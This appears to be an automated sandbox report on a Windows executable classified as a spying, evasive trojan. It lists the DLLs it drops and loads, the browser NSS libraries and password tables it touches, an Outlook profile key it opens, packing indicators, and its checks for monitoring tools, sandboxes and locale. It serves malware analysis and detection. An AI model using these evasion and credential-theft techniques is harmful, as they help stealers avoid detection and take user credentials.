Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D	0_2_00BDB88D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADB823	0_2_00ADB823
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE59DF	0_2_00BE59DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDF9DE	0_2_00BDF9DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B20954	0_2_00B20954
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BED31F	0_2_00BED31F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEACC0	0_2_00BEACC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD8414	0_2_00BD8414
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE2446	0_2_00BE2446
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE7442	0_2_00BE7442
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9A579	0_2_00A9A579
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD4D62	0_2_00BD4D62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE16E6	0_2_00BE16E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C55EB3	0_2_00C55EB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7E618	0_2_00B7E618
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3F1C	0_2_00BE3F1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 124 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 60 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 008145C0 appears 316 times

Source: file.exe, 00000000.00000002.2346342949.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: buwyflyk ZLIB complexity 0.99487341444595

Source: file.exe, 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2130002138.0000000005020000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00828680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00828680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00823720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00823720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\A486PQKR.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2212585432.000000001D664000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2225233336.000000001D680000.00000004.00000020.00020000.00000000.sdmp, AKFCFBAAEHCFHJJKEHJK.0.dr, GDBAKKKFBGDHJKFHJJJJ.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345665503.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1856512 > 1048576

Source: file.exe

Static PE information: Raw size of buwyflyk is bigger than: 0x100000 < 0x19f200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2346239645.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.810000.0.unpack :EW;.rsrc :W;.idata :W; :EW;buwyflyk:EW;bixnnjmh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;buwyflyk:EW;bixnnjmh:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00829860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00829860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c6226 should be: 0x1cf69a

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: buwyflyk
Source: file.exe	Static PE information: section name: bixnnjmh
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFE0CF push 04FAF50Ch; mov dword ptr [esp], eax	0_2_00CFE0D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C508D7 push edi; mov dword ptr [esp], edx	0_2_00C50905
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C558E3 push ebx; mov dword ptr [esp], ecx	0_2_00C558ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push eax; mov dword ptr [esp], ebp	0_2_00BDB897
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push ebx; mov dword ptr [esp], edi	0_2_00BDB913
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push ebp; mov dword ptr [esp], edi	0_2_00BDB9C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edi; mov dword ptr [esp], edx	0_2_00BDBA1D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push esi; mov dword ptr [esp], edx	0_2_00BDBA82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edi; mov dword ptr [esp], 73F5B1C7h	0_2_00BDBB39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edx; mov dword ptr [esp], esi	0_2_00BDBB45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 3485DF9Dh; mov dword ptr [esp], ecx	0_2_00BDBB5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 4D173D01h; mov dword ptr [esp], ebp	0_2_00BDBC56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 507178B3h; mov dword ptr [esp], ecx	0_2_00BDBC70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 6E7A6827h; mov dword ptr [esp], eax	0_2_00BDBC78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 598AABC2h; mov dword ptr [esp], ebx	0_2_00BDBD7F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 3A8FE631h; mov dword ptr [esp], ebx	0_2_00BDBDBB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 57B7A10Fh; mov dword ptr [esp], eax	0_2_00BDBE3F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push ecx; mov dword ptr [esp], edi	0_2_00BDBE43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push esi; mov dword ptr [esp], ebx	0_2_00BDBEB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push ebp; mov dword ptr [esp], edx	0_2_00BDBF07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push esi; mov dword ptr [esp], edx	0_2_00BDBF18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edx; mov dword ptr [esp], edi	0_2_00BDBF69
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push ecx; mov dword ptr [esp], 45BBBE87h	0_2_00BDBF75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edx; mov dword ptr [esp], eax	0_2_00BDBF9E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edx; mov dword ptr [esp], eax	0_2_00BDBFE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edi; mov dword ptr [esp], eax	0_2_00BDC00F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push eax; mov dword ptr [esp], ecx	0_2_00BDC064
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 547529B6h; mov dword ptr [esp], edx	0_2_00BDC0A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push esi; mov dword ptr [esp], ebx	0_2_00BDC0AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push 5A0C072Ch; mov dword ptr [esp], ecx	0_2_00BDC0D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDB88D push edx; mov dword ptr [esp], esi	0_2_00BDC15B

Source: file.exe

Static PE information: section name: buwyflyk entropy: 7.953044522628886

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00829860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-47146

Tries to detect sandboxes / dynamic malware analysis system (registry check)

